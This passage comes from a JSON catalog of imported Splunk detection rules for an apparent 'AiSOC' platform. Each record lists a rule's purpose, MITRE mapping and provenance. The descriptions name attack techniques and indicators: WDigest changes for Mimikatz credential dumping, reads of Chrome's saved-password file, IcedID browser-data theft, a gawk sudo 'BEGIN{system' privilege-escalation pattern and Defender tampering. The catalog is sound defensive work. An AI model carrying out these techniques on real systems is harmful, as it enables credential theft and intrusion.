"log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-system-user-discovery-via-quser.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0c3f3e09-e47a-410e-856f-a02a5c5fafb0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_system_user_discovery_via_quser.yml" } }, { "id": "splunk-security-content-0c7d8ffe-25b1-11ec-9f39-acde48001122", "type": "detection", "name": "Enable WDigest UseLogonCredential Registry", "description": "The following analytic detects a suspicious registry modification that enables the plain text credential feature in Windows by setting the \"UseLogonCredential\" value to 1 in the WDigest registry path. This detection leverages data from the Endpoint.Registry data model, focusing on specific registry paths and values. This activity is significant because it is commonly used by malware and tools like Mimikatz to dump plain text credentials, indicating a potential credential dumping attempt. If confirmed malicious, this could allow an attacker to obtain sensitive credentials, leading to further compromise and lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112", "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/enable-wdigest-uselogoncredential-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0c7d8ffe-25b1-11ec-9f39-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/enable_wdigest_uselogoncredential_registry.yml" } }, { "id": "splunk-security-content-0caf1c1c-0fba-401e-8ec7-f07cfdeee75b", "type": "detection", "name": "M365 Copilot Session Origin Anomalies", "description": "Detects M365 Copilot users accessing from multiple geographic locations to identify potential account compromise, credential sharing, or impossible travel patterns. The detection aggregates M365 Copilot Graph API events per user, calculating distinct cities and countries accessed, unique IP addresses, and the observation timeframe to compute a locations-per-day metric that measures geographic mobility. Users accessing Copilot from more than one city (cities_count > 1) are flagged and sorted by country and city diversity, surfacing accounts exhibiting anomalous geographic patterns that suggest compromised credentials being used from distributed locations or simultaneous access from impossible travel distances.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/m365-copilot-session-origin-anomalies.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0caf1c1c-0fba-401e-8ec7-f07cfdeee75b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/m365_copilot_session_origin_anomalies.yml" } }, { "id": "splunk-security-content-0cb847ee-9423-11ec-b2df-acde48001122", "type": "detection", "name": "Kerberos Pre-Authentication Flag Disabled in UserAccountControl", "description": "The following analytic detects when the Kerberos Pre-Authentication flag is disabled in a user account, using Windows Security Event 4738. This event indicates a change in the UserAccountControl property of a domain user object. Disabling this flag allows adversaries to perform offline brute force attacks on the user's password using the AS-REP Roasting technique. This activity is significant as it can be used by attackers with existing privileges to escalate their access or maintain persistence. If confirmed malicious, this could lead to unauthorized access and potential compromise of sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1558.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kerberos-pre-authentication-flag-disabled-in-useraccountcontrol.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0cb847ee-9423-11ec-b2df-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/kerberos_pre_authentication_flag_disabled_in_useraccountcontrol.yml" } }, { "id": "splunk-security-content-0cdf318b-a0dd-47d7-b257-c621c0247de8", "type": "detection", "name": "User Discovery With Env Vars PowerShell", "description": "The following analytic detects the execution of `powershell.exe` with command-line arguments that use PowerShell environment variables to identify the current logged user. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant as adversaries may use it for situational awareness and Active Directory discovery on compromised endpoints. If confirmed malicious, this behavior could allow attackers to gather critical user information, aiding in further exploitation and lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/user-discovery-with-env-vars-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0cdf318b-a0dd-47d7-b257-c621c0247de8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/user_discovery_with_env_vars_powershell.yml" } }, { "id": "splunk-security-content-0d32ba37-80fc-4429-809c-0ba15801aeaf", "type": "detection", "name": "Windows Credentials from Password Stores Chrome Login Data Access", "description": "The following analytic identifies non-Chrome processes accessing the Chrome user data file \"login data.\" This file is an SQLite database containing sensitive information, including saved passwords. The detection leverages Windows Security Event logs, specifically event code 4663, to monitor access attempts. This activity is significant as it may indicate attempts by threat actors to extract and decrypt stored passwords, posing a risk to user credentials. If confirmed malicious, attackers could gain unauthorized access to sensitive accounts and escalate their privileges within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1012" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-credentials-from-password-stores-chrome-login-data-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0d32ba37-80fc-4429-809c-0ba15801aeaf", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_credentials_from_password_stores_chrome_login_data_access.yml" } }, { "id": "splunk-security-content-0d370304-5f26-11ec-a4bb-acde48001122", "type": "detection", "name": "Linux Edit Cron Table Parameter", "description": "The following analytic detects the suspicious editing of cron jobs in Linux using the crontab command-line parameter (-e). It identifies this activity by monitoring command-line executions involving 'crontab' and the edit parameter. This behavior is significant for a SOC as cron job manipulations can indicate unauthorized persistence attempts or scheduled malicious actions. If confirmed malicious, this activity could lead to system compromise, unauthorized access, or broader network compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-edit-cron-table-parameter.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0d370304-5f26-11ec-a4bb-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_edit_cron_table_parameter.yml" } }, { "id": "splunk-security-content-0d41772b-35ab-4e1c-a2ba-d0b455481aee", "type": "detection", "name": "Windows AD GPO Deleted", "description": "This detection identifies when an Active Directory Group Policy is deleted using the Group Policy Management Console.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001", "T1484.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-gpo-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0d41772b-35ab-4e1c-a2ba-d0b455481aee", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_gpo_deleted.yml" } }, { "id": "splunk-security-content-0d42b295-0f1f-4183-b75e-377975f47c65", "type": "detection", "name": "Kubernetes Process with Resource Ratio Anomalies", "description": "The following analytic detects anomalous changes in resource utilization ratios for processes running on a Kubernetes node. It leverages process metrics collected via an OTEL collector and hostmetrics receiver, analyzed through Splunk Observability Cloud. The detection uses a lookup table containing average and standard deviation values for various resource ratios (e.g., CPU:memory, CPU:disk operations). Significant deviations from these baselines may indicate compromised processes, malicious activity, or misconfigurations. If confirmed malicious, this could signify a security breach, allowing attackers to manipulate workloads, potentially leading to data exfiltration or service disruption.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-process-with-resource-ratio-anomalies.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0d42b295-0f1f-4183-b75e-377975f47c65", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_process_with_resource_ratio_anomalies.yml" } }, { "id": "splunk-security-content-0d718b52-c9f1-11eb-bc61-acde48001122", "type": "detection", "name": "Powershell Processing Stream Of Data", "description": "The following analytic detects suspicious PowerShell script execution involving compressed stream data processing, identified via EventCode 4104. It leverages PowerShell Script Block Logging to flag scripts using `IO.Compression`, `IO.StreamReader`, or decompression methods. This activity is significant as it often indicates obfuscated PowerShell or embedded .NET/binary execution, which are common tactics for evading detection. If confirmed malicious, this behavior could allow attackers to execute hidden code, escalate privileges, or maintain persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-processing-stream-of-data.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0d718b52-c9f1-11eb-bc61-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_processing_stream_of_data.yml" } }, { "id": "splunk-security-content-0db4da70-f14b-11eb-8043-acde48001122", "type": "detection", "name": "IcedID Exfiltrated Archived File Creation", "description": "The following analytic detects the creation of suspicious files named passff.tar and cookie.tar, which are indicative of archived stolen browser information such as history and cookies on a machine compromised with IcedID. It leverages Sysmon EventCode 11 to identify these specific filenames. This activity is significant because it suggests that sensitive browser data has been exfiltrated, which could lead to further exploitation or data breaches. If confirmed malicious, this could allow attackers to access personal information, conduct further phishing attacks, or escalate their presence within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1560.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/icedid-exfiltrated-archived-file-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0db4da70-f14b-11eb-8043-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/icedid_exfiltrated_archived_file_creation.yml" } }, { "id": "splunk-security-content-0dbcac64-963c-11ec-bf04-acde48001122", "type": "detection", "name": "Windows File Without Extension In Critical Folder", "description": "This analytic detects the creation of files without extensions in critical Windows system and driver-related directories, including but not limited to System32\\Drivers, Windows\\WinSxS, and other known Windows driver storage and loading paths. The detection has been expanded to comprehensively cover all commonly abused and legitimate Windows driver folder locations, increasing visibility into attempts to stage or deploy kernel-mode components. The analytic leverages telemetry from the Endpoint.Filesystem data model, with a focus on file creation events and file path analysis. File creation activity in these directories\u2014particularly involving extensionless files\u2014is highly suspicious, as it may indicate the presence of destructive or stealthy malware. This behavior is consistent with malware families such as HermeticWiper, which deploy kernel driver components into trusted Windows driver directories to obtain low-level access and execute destructive payloads. If confirmed malicious, this activity can result in severe system compromise, including the deployment of malicious drivers, boot-sector or filesystem destruction, and ultimately system inoperability and irreversible data loss.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-file-without-extension-in-critical-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0dbcac64-963c-11ec-bf04-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_file_without_extension_in_critical_folder.yml" } }, { "id": "splunk-security-content-0dc25c24-6fcf-456f-b08b-dd55a183e4de", "type": "detection", "name": "Windows Service Stop Win Updates", "description": "The following analytic detects the disabling of Windows Update services, such as \"Update Orchestrator Service for Windows Update,\" \"WaaSMedicSvc,\" and \"Windows Update.\" It leverages Windows System Event ID 7040 logs to identify changes in service start modes to 'disabled.' This activity is significant as it can indicate an adversary's attempt to evade defenses by preventing critical updates, leaving the system vulnerable to exploits. If confirmed malicious, this could allow attackers to maintain persistence and exploit unpatched vulnerabilities, compromising the integrity and security of the affected host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-service-stop-win-updates.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0dc25c24-6fcf-456f-b08b-dd55a183e4de", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_service_stop_win_updates.yml" } }, { "id": "splunk-security-content-0dc44d03-8c00-482d-ba7c-796ba7ab18c9", "type": "detection", "name": "Windows Remote Create Service", "description": "The following analytic identifies the creation of a new service on a remote endpoint using sc.exe. It leverages data from Endpoint Detection and Response (EDR) agents, specifically monitoring for EventCode 7045, which indicates a new service creation. This activity is significant as it may indicate lateral movement or remote code execution attempts by an attacker. If confirmed malicious, this could allow the attacker to establish persistence, escalate privileges, or execute arbitrary code on the remote system, potentially leading to further compromise of the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-remote-create-service.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0dc44d03-8c00-482d-ba7c-796ba7ab18c9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_remote_create_service.yml" } }, { "id": "splunk-security-content-0dcf43b9-50d8-42a6-acd9-d1c9201fe6ae", "type": "detection", "name": "Linux GNU Awk Privilege Escalation", "description": "The following analytic detects the execution of the 'gawk' command with elevated privileges on a Linux system. It leverages Endpoint Detection and Response (EDR) telemetry to identify command-line executions where 'gawk' is used with 'sudo' and 'BEGIN{system' patterns. This activity is significant because it indicates a potential privilege escalation attempt, allowing a user to execute system commands as root. If confirmed malicious, this could lead to full root access, enabling the attacker to control the system, modify critical files, and maintain persistent access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-gnu-awk-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0dcf43b9-50d8-42a6-acd9-d1c9201fe6ae", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_gnu_awk_privilege_escalation.yml" } }, { "id": "splunk-security-content-0dd296a2-4338-11ec-ba02-3e22fbd008af", "type": "detection", "name": "Remote Process Instantiation via WinRM and Winrs", "description": "The following analytic detects the execution of `winrs.exe` with command-line arguments used to start a process on a remote endpoint. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions mapped to the `Processes` node of the `Endpoint` data model. This activity is significant as it may indicate lateral movement or remote code execution attempts by adversaries. If confirmed malicious, this could allow attackers to execute arbitrary code on remote systems, potentially leading to further compromise and lateral spread within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/remote-process-instantiation-via-winrm-and-winrs.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0dd296a2-4338-11ec-ba02-3e22fbd008af", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/remote_process_instantiation_via_winrm_and_winrs.yml" } }, { "id": "splunk-security-content-0df33e1a-9ef6-11ec-a1ad-acde48001122", "type": "detection", "name": "Windows Disable Change Password Through Registry", "description": "The following analytic detects a suspicious registry modification that disables the Change Password feature on a Windows host. It identifies changes to the registry path \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableChangePassword\" with a value of \"0x00000001\". This activity is significant as it can prevent users from changing their passwords, a tactic often used by ransomware to maintain control over compromised systems. If confirmed malicious, this could hinder user response to an attack, allowing the attacker to persist and potentially escalate their access within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-disable-change-password-through-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0df33e1a-9ef6-11ec-a1ad-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_disable_change_password_through_registry.yml" } }, { "id": "splunk-security-content-0df524ad-6d78-4883-9987-d29418928103", "type": "detection", "name": "Crowdstrike High Identity Risk Severity", "description": "The following analytic detects CrowdStrike alerts for High Identity Risk Severity with a risk score of 70 or higher. These alerts indicate significant vulnerabilities in user identities, such as suspicious behavior or compromised credentials. Promptly investigating and addressing these alerts is crucial to prevent potential security breaches and ensure the integrity and protection of sensitive information and systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/crowdstrike-high-identity-risk-severity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0df524ad-6d78-4883-9987-d29418928103", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/crowdstrike_high_identity_risk_severity.yml" } }, { "id": "splunk-security-content-0e4d46b1-22bd-4f0e-8337-ca6f60ad4bea", "type": "detection", "name": "Windows Defender ASR Audit Events", "description": "This detection searches for Windows Defender ASR audit events. ASR is a feature of Windows Defender Exploit Guard that prevents actions and apps that are typically used by exploit-seeking malware to infect machines. ASR rules are applied to processes and applications. When a process or application attempts to perform an action that is blocked by an ASR rule, an event is generated. This detection searches for ASR audit events that are generated when a process or application attempts to perform an action that would be blocked by an ASR rule, but is allowed to proceed for auditing purposes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059", "T1566.001", "T1566.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-defender-asr-audit-events.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0e4d46b1-22bd-4f0e-8337-ca6f60ad4bea", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_defender_asr_audit_events.yml" } }, { "id": "splunk-security-content-0e5e25c3-32f4-46f7-ba4a-5b95c3b90f5b", "type": "detection", "name": "Windows Modify Registry Disable Win Defender Raw Write Notif", "description": "The following analytic detects modifications to the Windows registry that disable the Windows Defender raw write notification feature. It leverages data from the Endpoint.Registry datamodel, specifically monitoring changes to the registry path associated with Windows Defender's real-time protection settings. This activity is significant because disabling raw write notifications can allow malware, such as Azorult, to bypass Windows Defender's behavior monitoring, potentially leading to undetected malicious activities. If confirmed malicious, this could enable attackers to execute code, persist in the environment, and access sensitive information without detection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-disable-win-defender-raw-write-notif.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0e5e25c3-32f4-46f7-ba4a-5b95c3b90f5b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_disable_win_defender_raw_write_notif.yml" } }, { "id": "splunk-security-content-0ecb40d9-492b-4a57-9f87-515dd742794c", "type": "detection", "name": "Windows AutoIt3 Execution", "description": "The following analytic detects the execution of AutoIt3, a scripting\nlanguage often used for automating Windows GUI tasks and general scripting.\nIt identifies instances where AutoIt3 or its variants are executed by searching for process names\nor original file names matching 'autoit3.exe'.\nThis activity is significant because attackers frequently use AutoIt3 to automate malicious actions, such as executing malware.\nIf confirmed malicious, this activity could lead to unauthorized code execution,\nsystem compromise, or further propagation of malware within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-autoit3-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0ecb40d9-492b-4a57-9f87-515dd742794c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_autoit3_execution.yml" } }, { "id": "splunk-security-content-0edd5112-56c9-11ec-b990-acde48001122", "type": "detection", "name": "Suspicious Linux Discovery Commands", "description": "The following analytic detects the execution of suspicious bash commands commonly used in scripts like AutoSUID, LinEnum, and LinPeas for system discovery on a Linux host. It leverages Endpoint Detection and Response (EDR) data, specifically looking for a high number of distinct commands executed within a short time frame. This activity is significant as it often precedes privilege escalation or other malicious actions. If confirmed malicious, an attacker could gain detailed system information, identify vulnerabilities, and potentially escalate privileges, posing a severe threat to the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-linux-discovery-commands.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0edd5112-56c9-11ec-b990-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_linux_discovery_commands.yml" } }, { "id": "splunk-security-content-0f09cedd-10f1-4b9f-bdea-7a8b06ea575d", "type": "detection", "name": "Windows PowerShell Script Block With Malicious String", "description": "The following analytic detects the execution of multiple offensive toolkits and commands by leveraging PowerShell Script Block Logging (EventCode=4104). This method captures and logs the full command sent to PowerShell, allowing for the identification of suspicious activities including several well-known tools used for credential theft, lateral movement, and persistence. If confirmed malicious, this could lead to unauthorized access, privilege escalation, and potential compromise of sensitive information within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-powershell-script-block-with-malicious-string.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0f09cedd-10f1-4b9f-bdea-7a8b06ea575d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_powershell_script_block_with_malicious_string.yml" } }, { "id": "splunk-security-content-0f216a38-f45f-11eb-b09c-acde48001122", "type": "detection", "name": "Sqlite Module In Temp Folder", "description": "The following analytic detects the creation of sqlite3.dll files in the %temp% folder. It leverages Sysmon EventCode 11 to identify when these files are written to the temporary directory. This activity is significant because it is associated with IcedID malware, which uses the sqlite3 module to parse browser databases and steal sensitive information such as banking details, credit card information, and credentials. If confirmed malicious, this behavior could lead to significant data theft and compromise of user accounts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/sqlite-module-in-temp-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0f216a38-f45f-11eb-b09c-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/sqlite_module_in_temp_folder.yml" } }, { "id": "splunk-security-content-0f43758f-1fe9-470a-a9e4-780acc4d5407", "type": "detection", "name": "Windows File Transfer Protocol In Non-Common Process Path", "description": "The following analytic detects FTP connections initiated by processes located in non-standard installation paths on Windows systems. It leverages Sysmon EventCode 3 to identify network connections where the process image path does not match common directories like \"Program Files\" or \"Windows\\System32\". This activity is significant as FTP is often used by adversaries and malware, such as AgentTesla, for Command and Control (C2) communications to exfiltrate stolen data. If confirmed malicious, this could lead to unauthorized data transfer, exposing sensitive information and compromising the integrity of the affected host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-file-transfer-protocol-in-non-common-process-path.yaml", "quarantine_reason": "imported rule; upstream query language not 